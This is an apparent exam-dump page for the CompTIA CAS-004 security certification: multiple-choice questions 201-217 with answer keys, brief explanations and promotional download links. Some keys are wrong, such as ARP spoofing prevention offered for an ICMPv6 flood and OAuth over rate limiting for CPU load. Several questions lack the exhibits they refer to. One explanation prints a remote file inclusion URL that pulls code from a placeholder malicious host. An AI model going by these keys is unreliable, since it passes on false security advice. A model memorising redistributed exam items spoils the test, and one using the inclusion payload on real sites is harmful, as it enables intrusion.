CAS-004 Certification Exam Dumps Questions in here [Aug-2023]
Updated CAS-004 Exam Practice Test Questions
CompTIA CAS-004 (CompTIA Advanced Security Practitioner (CASP+)) exam is a certification offered by CompTIA, a globally recognized organization that provides vendor-neutral IT certifications. The CASP+ certification is designed for experienced IT professionals who want to advance their knowledge and skills in the field of cybersecurity. CompTIA Advanced Security Practitioner (CASP+) Exam certification validates the skills required for advanced-level security practitioners who have the necessary technical knowledge and skills to conceptualize, design, and engineer secure solutions across complex enterprise environments.
NEW QUESTION # 201
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice.
Which of the following should the organization consider FIRST to address this requirement?
- A. Identify critical business processes and determine associated software and hardware requirements.
- B. Hire additional on-call staff to be deployed if an event occurs.
- C. Design an appropriate warm site for business continuity.
- D. Implement a change management plan to ensure systems are using the appropriate versions.
Answer: A
Explanation:
When developing a plan, the first thing to consider is the business process and their impact on operations. A warm site does not make sense even if it were to be first, as a warm site does not replicate in a manner that provides "moments notice" fail over.
NEW QUESTION # 202
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints.
The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?
- A. NAC to control authorized endpoints
- B. A general VPN solution to the primary network
- C. FIM on the servers storing the data
- D. A jump box in the screened subnet
Answer: D
Explanation:
To support the specific environment that handles sensitive data while remaining compliant with the security compliance requirement, it would be appropriate to implement a jump box in the screened subnet for privileged users.
A jump box is a secure server that is used as a central point of access to a restricted network. It is typically used to provide remote access to a screened subnet, which is a network segment that is isolated from the rest of the network and is only accessible through a jump box or other secure access point. By using a jump box, privileged users can access the environment and support it from their workstations while still maintaining need-to-know restrictions and only connecting to authorized endpoints.
NEW QUESTION # 203
A security administrator receives reports that several workstations are unable to access resources within one network segment.
A packet capture shows the segment is flooded with ICMPv6 traffic from the source fe80::21ae;4571:42ab:1fdd and for the destination ff02::1.
Which of the following should the security administrator integrate into the network to help prevent this from occurring?
- A. Deploy honeypots on the network segment to identify the sending machine.
- B. Raise the dead peer detection interval to prevent the additional network chatter
- C. Deploy ARP spoofing prevention on routers and switches.
- D. Ensure routers will use route advertisement guards.
Answer: C
NEW QUESTION # 204
A security analyst is reviewing the following vulnerability assessment report:
Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?
- A. Server1
- B. Server 3
- C. Server2
- D. Servers
Answer: A
NEW QUESTION # 205
A company is preparing to deploy a global service.
Which of the following must the company do to ensure GDPR compliance? (Choose two.)
- A. Provide optional data encryption.
- B. Provide opt-in/out for marketing messages.
- C. Provide data deletion capabilities.
- D. Provide alternative authentication techniques.
- E. Inform users regarding what data is stored.
- F. Grant data access to third parties.
Answer: B,E
NEW QUESTION # 206
Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity?
- A. Key recovery
- B. Key escrow
- C. Key sharing
- D. Key distribution
Answer: D
Explanation:
Key Escrow is the process to store the key. Totally use key Escrow with CASB and third party but the deliver system is Key Distribution. In short escrow is method of storing and distribution is method of delivery.
https://csrc.nist.gov/glossary/term/key_distribution
https://jumpcloud.com/blog/key-escrow
NEW QUESTION # 207
A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.
Which of the following is the BEST solution to meet these objectives?
- A. Implement EDR, remove users from the local administrators group, and enable privilege escalation monitoring.
- B. Implement PAM, remove users from the local administrators group, and prompt users for explicit approval when elevated privileges are required.
- C. Implement Privileged Access Management (PAM), keep users in the local administrators group, and enable local administrator account monitoring.
- D. Implement EDR, keep users in the local administrators group, and enable user behavior analytics.
Answer: B
Explanation:
To improve accounts lifecycle and management, it is recommended you manage privilege access management within PAM, by importing the local administrators into PAM, reducing the number of local administrators and prevent them to see those accounts passwords.
NEW QUESTION # 208
Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition. Company A is requiring the following:
- Before the merger is complete, users from both companies should use a single set of usernames and passwords.
- Users in the same departments should have the same set of rights and
privileges, but they should have different sets of rights and
privileges if they have different IPs.
- Users from Company B should be able to access Company A's available
resources.
Which of the following are the BEST solutions? (Choose two.)
- A. Implementing attribute-based access control
- B. Updating login scripts
- C. Installing new Group Policy Object policies
- D. Establishing one-way trust from Company B to Company A
- E. Installing Company A's Kerberos systems in Company B's network
- F. Enabling SAML
Answer: D,F
NEW QUESTION # 209
A security engineer has implemented an internal user access review tool so service teams can baseline user accounts and group memberships. The tool is functional and popular among its initial set of onboarded teams. However, the tool has not been built to cater to a broader set of internal teams yet. The engineer has sought feedback from internal stakeholders, and a list of summarized requirements is as follows:
The tool needs to be responsive so service teams can query it, and
then perform an automated response action.
The tool needs to be resilient to outages so service teams can perform
the user access review at any point in time and meet their own SLAs.
The tool will become the system-of-record for approval, reapproval,
and removal life cycles of group memberships and must allow for data
retrieval after failure.
Which of the following need specific attention to meet the requirements listed above? (Choose three.)
- A. Recoverability
- B. Usability
- C. Latency
- D. Maintainability
- E. Scalability
- F. Availability
Answer: A,C,F
NEW QUESTION # 210
A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.
Which of the following should the security analyst perform?
- A. Configure the email gateway to automatically quarantine all messages originating from the business partner.
- B. Contact the security department at the business partner and alert them to the email event.
- C. Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
- D. Block the IP address for the business partner at the perimeter firewall.
Answer: B
NEW QUESTION # 211
A security engineer notices the company website allows users following example:
hitps://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site?
- A. Unsecure references
- B. SQL injection
- C. Remote file inclusion
- D. Directory traversal -
Answer: C
Explanation:
Explanation
Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application12. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization23.
In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this:
https://mycompany.com/main.php?Country=https://malicious.com/evil.php
This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code3.
NEW QUESTION # 212
A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.
Which of the following should a security architect recommend?
- A. A DLP program to identify which files have customer data and delete them
- B. A CMDB to report on systems that are not configured to security baselines
- C. An ERP program to identify which processes need to be tracked
- D. A CRM application to consolidate the data and provision access based on the process and need
Answer: A
NEW QUESTION # 213
A Chief information Security Officer (CISO) is developing corrective-action plans based on the following from a vulnerability scan of internal hosts:
Which of the following MOST appropriate corrective action to document for this finding?
- A. The product owner should perform a business impact assessment regarding the ability to implement a WAF.
- B. The system administrator should evaluate dependencies and perform upgrade as necessary.
- C. The security operations center should develop a custom IDS rule to prevent attacks buffer overflows against this server.
- D. The application developer should use a static code analysis tool to ensure any application code is not vulnerable to buffer overflows.
Answer: A
NEW QUESTION # 214
A security is assisting the marketing department with ensuring the security of the organization's social media platforms. The two main concerns are:
The Chief marketing officer (CMO) email is being used department wide as the username
The password has been shared within the department
Which of the following controls would be BEST for the analyst to recommend?
- A. Configure MFA for all users to decrease their reliance on other authentication.
- B. Have periodic, scheduled reviews to determine which OAuth configuration are set for each media platform.
- C. Create multiple social media accounts for all marketing user to separate their actions.
- D. Ensue the password being shared is sufficiently and not written down anywhere.
Answer: A
NEW QUESTION # 215
Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.
Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner?
- A. Implement OAuth 2.0 on the API.
- B. Implement rate limiting on the API.
- C. Implement input validation on the API.
- D. Implement geoblocking on the WAF.
Answer: A
Explanation:
Keyword here is that the API does not require authentication. OAUTH 2.0 solves that and will improve performance by only processing authenticated calls.
NEW QUESTION # 216
A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services to ensure false positives do not drop legitimate traffic.
Which of the following would satisfy the requirement?
- A. NIPS
- B. WAF
- C. Reverse proxy
- D. NIDS
Answer: D
NEW QUESTION # 217
......
Verified CAS-004 dumps Q&As 100% Pass in First Attempt Guaranteed Updated Dump: https://drive.google.com/open?id=1o8JX_9486d1aBIQhEl7OrbIzN205FDBL
Pass CompTIA CASP CAS-004 Exam With 472 Questions: https://www.itexamdownload.com/CAS-004-valid-questions.html